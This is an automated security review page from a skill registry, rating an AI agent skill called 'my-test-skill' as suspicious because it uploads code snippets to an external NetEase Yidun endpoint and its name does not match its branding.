Back to skill
Skillv0.0.1
ClawScan security
my-test-skill · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
SuspiciousMar 12, 2026, 8:27 AM
- Verdict
- suspicious
- Confidence
- medium
- Model
- gpt-5-mini
- Summary
- The skill's instructions match a hybrid local/cloud security scanner, but there are mismatches and privacy/network concerns (uploading extracted code snippets to an external endpoint and the SKILL.md name/identity mismatch) that warrant caution before installing.
- Guidance
- This skill appears to implement a legitimate hybrid local/cloud scanner, but take these precautions before installing: 1) Verify publisher identity and that the registry package name matches the SKILL.md branding (my-test-skill vs yidun-skill-sec). 2) Understand cloud mode will POST fingerprints, behavior tags, and extracted code snippets to https://as.dun.163.com (NetEase Yidun); if those metadata or snippets could be sensitive, disable cloud mode (YIDUN_SKILL_SEC_CLOUD=false) or avoid using the skill. 3) Confirm you trust the external operator and your organization’s policies about sending package data abroad. 4) If you need stronger assurance, request a signed release, a canonical source (GitHub repo/release), or an audited implementation rather than relying on SKILL.md prose alone.
- Findings
[no-code-files] expected: The static regex scanner found no code files because this is an instruction-only skill (SKILL.md + README). Lack of code files is expected but means the scanner could not validate implementation details; behavior is driven by the prose in SKILL.md.
Review Dimensions
- Purpose & Capability
- noteThe SKILL.md and README implement exactly what the description promises: local fingerprinting and static analysis plus an optional cloud intelligence POST to as.dun.163.com. Required binaries (curl, jq, openssl) are appropriate. However, the registry metadata lists the skill as 'my-test-skill' while the SKILL.md/README identify the package as 'yidun-skill-sec' / 'YidunClawSec' (branding mismatch), which is an incoherence worth verifying with the publisher.
- Instruction Scope
- concernInstructions explicitly compute file-level hashes, extract code snippets that triggered detections, build a fingerprint manifest, and upload fingerprint/behavior tags/evidence to a remote endpoint. Uploading extracted code snippets (even if partial) to an external service is within the stated purpose (cloud analysis) but is a privacy/data-exfiltration risk that should be acknowledged. The SKILL.md also references source metadata (install_url, author data) that implies additional registry queries or metadata collection outside the package; those network actions are not declared in the registry metadata but are consistent with the scanner's needs.
- Install Mechanism
- okInstruction-only skill with no install spec and no code files — nothing is downloaded or installed by the skill package itself. This minimizes install-time risk. The only runtime network activity described is to the cloud analysis endpoint, which is implemented via curl (declared).
- Credentials
- noteNo required secrets or privileged env vars are listed. Two optional env vars are declared (YIDUN_SKILL_SEC_CLOUD to toggle cloud, and YIDUN_SKILL_SEC_TRUSTED_REGISTRIES) which are proportionate. Still, because the skill will send fingerprints and extracted snippets to an external endpoint, users should consider whether that data is acceptable to disclose to the named operator (NetEase Yidun) before enabling cloud mode.
- Persistence & Privilege
- okalways is false and the skill does not request persistent platform-level privileges or modification of other skills. Autonomous invocation is allowed by default but that is the platform norm and not by itself a red flag here.